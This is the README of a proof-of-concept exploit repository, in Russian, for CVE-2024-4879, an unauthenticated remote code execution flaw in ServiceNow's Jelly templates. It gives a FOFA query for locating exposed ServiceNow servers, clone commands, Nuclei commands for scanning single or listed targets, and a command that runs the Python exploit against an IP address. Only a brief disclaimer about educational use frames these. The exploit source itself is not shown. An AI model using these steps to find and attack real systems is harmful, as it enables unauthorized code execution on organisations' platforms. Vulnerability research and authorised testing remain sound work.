
Эксплойт для проверки концепции (PoC) для CVE-2024-4879 — уязвимости инъекции Jelly-шаблонов в ServiceNow, позволяющей неаутентифицированное удалённое выполнение кода. Включает шаблон Nuclei и скрипт эксплойта на Python.
ServiceNow устранила уязвимость проверки входных данных, обнаруженную в выпусках Now Platform Vancouver и Washington, D.C. Эта уязвимость может позволить неаутентифицированному пользователю удаленно выполнить код в контексте Now Platform.
FOFA : "server : servicenow"
git clone https://github.com/fa-rrel/CVE-2024-4879.git
cd CVE-2024-4879
Одиночная цель:
nuclei -u https://target.com -t CVE-2024-4879.yaml -nh
Несколько целей:
nuclei -l urls.txt -t CVE-2024-4879.yaml -nh
python3 CVE-2024-4879.py -i (192.168.1.1)
// Отказ от ответственности // Взлом без разрешения незаконен. Этот репозиторий предназначен исключительно для образовательных целей в области кибербезопасности, этичного взлома, тестирования на проникновение и баг-хантинг, чтобы мы могли защитить себя от реальных хакеров..